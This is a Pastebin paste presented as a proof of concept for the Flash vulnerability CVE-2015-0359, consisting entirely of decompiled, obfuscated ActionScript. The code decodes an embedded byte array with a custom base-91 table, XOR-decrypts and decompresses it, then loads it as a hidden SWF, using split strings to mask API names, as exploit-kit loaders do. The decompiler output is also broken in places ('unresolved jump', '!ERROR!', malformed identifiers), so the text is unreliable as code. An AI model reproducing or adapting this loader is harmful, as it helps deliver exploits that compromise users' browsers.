Advertisement
_d3f4ult

[+] Flash_Exploit.SWF CVE-2015-0359 PoC [+]

Apr 28th, 2015
2,387
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.11 KB | None | 0 0
  1. package {
  2.  
  3. public class $1$6$7$@120984$cQhWvZ56 {
  4.  
  5. }
  6. $1$6$7$@120984$cQhWvZ56 = [OP_NEWCLASS ClassInfo:0 base:Object];
  7. 34643$OfA2FuRBJ#@ = [OP_NEWCLASS ClassInfo:1 base:MovieClip];
  8. 3m3qT@@9jm4 = [OP_NEWCLASS ClassInfo:2 base:Object];
  9. 6KovfYYrEFkW = [OP_NEWCLASS ClassInfo:3 base:ByteArray];
  10. }//package
  11.  
  12. import flash.display.*;
  13. import flash.system.*;
  14. import flash.utils.*;
  15.  
  16. package {
  17. public class 34643$OfA2FuRBJ#@ extends MovieClip {
  18.  
  19. private var 13AFv7jyfFP;
  20. private var YWH9DbQhT:Class;
  21. private var 65%$uHPix2Gq4k%ss = "ToStage";
  22. private var _StrPool46:uint = 0;
  23. private var %%Awjftgdfe^&:uint = 0;
  24. private var X4O3S0e:uint = 0xFF;
  25. private var 3eMXkL2fIA;
  26. private var 86OI8FG3RS4;
  27.  
  28. public function 34643$OfA2FuRBJ#@(_arg1:Object=null){
  29. Security[((("al" + "low") + "Dom") + "ain")]("*");
  30. var _local2:* = ApplicationDomain[(("current" + "Do") + "main")];
  31. this.65%$uHPix2Gq4k%ss = (("ad" + "ded") + this.65%$uHPix2Gq4k%ss);
  32. var _local4 = (_local2[("getD" + "efinition")]("flash.display.Loader") as Class);
  33. this.13AFv7jyfFP = new (_local4)();
  34. this.YWH9DbQhT = (_local2[("getD" + "efinition")]("flash.utils.ByteArray") as Class);
  35. if (this["stage"]){
  36. this.4kjf1flZV1ZTA7();
  37. } else {
  38. this["addEventListener"](this.65%$uHPix2Gq4k%ss, this.4kjf1flZV1ZTA7);
  39. };
  40. }
  41. public function EmptyHandler(_arg1:Object, _arg2:int):void{
  42. _arg2++;
  43. }
  44. private function 4kjf1flZV1ZTA7(_arg1:Object=null):void{
  45. this[(("rem" + "oveEven") + "tListener")](this.65%$uHPix2Gq4k%ss, this.4kjf1flZV1ZTA7);
  46. this["addEventListener"]("enterFrame", this.TVN3N5UQ);
  47. var _local2:* = new 6KovfYYrEFkW();
  48. var _local3:* = new this.YWH9DbQhT();
  49. this.$$!!323tr();
  50. this.ym9LDy3rDi8Fz(_local2, _local2["length"], _local3);
  51. this.gzZrsob66e0cB6oT(_local3);
  52. var _local4:uint = 91;
  53. var _local5 = 0;
  54. if ((_local5 < _local3["length"])){
  55. var _local6:uint = (_local3[_local5] ^ _local4);
  56. _local4 = _local3[_local5];
  57. _local3[_local5] = _local6;
  58. _local5++;
  59. //unresolved jump
  60. };
  61. var _local8 = "com";
  62. _local3[((("un" + _local8) + "pres") + "s")]();
  63. this.13AFv7jyfFP[("load" + "Bytes")](_local3);
  64. this[("add" + "Child")](this.13AFv7jyfFP);
  65. //unresolved jump
  66. !ERROR! return;
  67. }
  68. private function TVN3N5UQ(_arg1):void{
  69. if ((this.currentFrame == 200)){
  70. this.gotoAndPlay(new Number(2));
  71. return;
  72. };
  73. }
  74. private function $$!!323tr():void{
  75. this.3eMXkL2fIA = new this.YWH9DbQhT();
  76. this.86OI8FG3RS4 = new this.YWH9DbQhT();
  77. var _local2:int;
  78. _local2 = 65;
  79. if ((_local2 < 91)){
  80. this.86OI8FG3RS4["writeByte"](_local2);
  81. _local2++;
  82. //unresolved jump
  83. };
  84. _local2 = 97;
  85. if ((_local2 < 123)){
  86. this.86OI8FG3RS4["writeByte"](_local2);
  87. _local2++;
  88. //unresolved jump
  89. };
  90. _local2 = 48;
  91. if ((_local2 < 58)){
  92. this.86OI8FG3RS4["writeByte"](_local2);
  93. _local2++;
  94. //unresolved jump
  95. };
  96. _local2 = 33;
  97. if ((_local2 < 48)){
  98. if ((((((_local2 == 34)) || ((_local2 == 39)))) || ((_local2 == 45)))){
  99. } else {
  100. this.86OI8FG3RS4["writeByte"](_local2);
  101. };
  102. _local2++;
  103. //unresolved jump
  104. };
  105. _local2 = 58;
  106. if ((_local2 < 65)){
  107. this.86OI8FG3RS4["writeByte"](_local2);
  108. _local2++;
  109. //unresolved jump
  110. };
  111. _local2 = 91;
  112. if ((_local2 < 97)){
  113. if ((_local2 == 92)){
  114. } else {
  115. this.86OI8FG3RS4["writeByte"](_local2);
  116. };
  117. _local2++;
  118. //unresolved jump
  119. };
  120. _local2 = 123;
  121. if ((_local2 < 127)){
  122. this.86OI8FG3RS4["writeByte"](_local2);
  123. _local2++;
  124. //unresolved jump
  125. };
  126. this.86OI8FG3RS4["writeByte"](34);
  127. var _local3:int;
  128. _local3 = 0;
  129. if ((_local3 < 0xFF)){
  130. this.3eMXkL2fIA[_local3] = 0xFF;
  131. _local3++;
  132. //unresolved jump
  133. };
  134. _local3 = 0;
  135. if ((_local3 < this.86OI8FG3RS4["length"])){
  136. this.3eMXkL2fIA[this.86OI8FG3RS4[_local3]] = _local3;
  137. _local3++;
  138. //unresolved jump
  139. };
  140. }
  141. public function gzZrsob66e0cB6oT(_arg1):uint{
  142. var _local2:uint = 0;
  143. if (!((this.X4O3S0e == 0xFF))){
  144. _arg1[_arg1["length"]] = (this._StrPool46 | (this.X4O3S0e << this.%%Awjftgdfe^&));
  145. _local2 = (_local2 + 1);
  146. };
  147. return (_local2);
  148. }
  149. public function ym9LDy3rDi8Fz(_arg1, _arg2:uint, _arg3):uint{
  150. var _local4 = 0;
  151. var _local5:uint = 0;
  152. _local4 = 0;
  153. if ((_local4 < _arg2)){
  154. if ((this.3eMXkL2fIA[_arg1[_local4]] == 0xFF)){
  155. } else {
  156. if ((this.X4O3S0e == 0xFF)){
  157. this.X4O3S0e = this.3eMXkL2fIA[_arg1[_local4]];
  158. } else {
  159. this.X4O3S0e = (this.X4O3S0e + (this.3eMXkL2fIA[_arg1[_local4]] * this.86OI8FG3RS4["length"]));
  160. this._StrPool46 = (this._StrPool46 | (this.X4O3S0e << this.%%Awjftgdfe^&));
  161. this.%%Awjftgdfe^& = (this.%%Awjftgdfe^& + ((((this.X4O3S0e & 8191) > 88)) ? 13 : 14));
  162. var _local7 = _local5;
  163. _local5 = (_local7 + 1);
  164. _arg3[_local7] = (this._StrPool46 & 0xFF);
  165. this._StrPool46 = (this._StrPool46 >> 8);
  166. this.%%Awjftgdfe^& = (this.%%Awjftgdfe^& - 8);
  167. //unresolved if
  168. this.X4O3S0e = 0xFF;
  169. };
  170. };
  171. _local4++;
  172. //unresolved jump
  173. };
  174. return (_local5);
  175. }
  176.  
  177. }
  178. }//package
  179.  
  180. package {
  181. public class 3m3qT@@9jm4 {
  182.  
  183. }
  184. }//package
  185.  
  186. package {
  187. public class 6KovfYYrEFkW extends ByteArray {
  188.  
  189. public function 9IRh0mi4XOG():void{
  190. }
  191. public function A3Ig1if():int{
  192. return (0);
  193. }
  194.  
  195. }
  196. }//package
  197.  
  198. "twitter.com/_d3f4ult"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement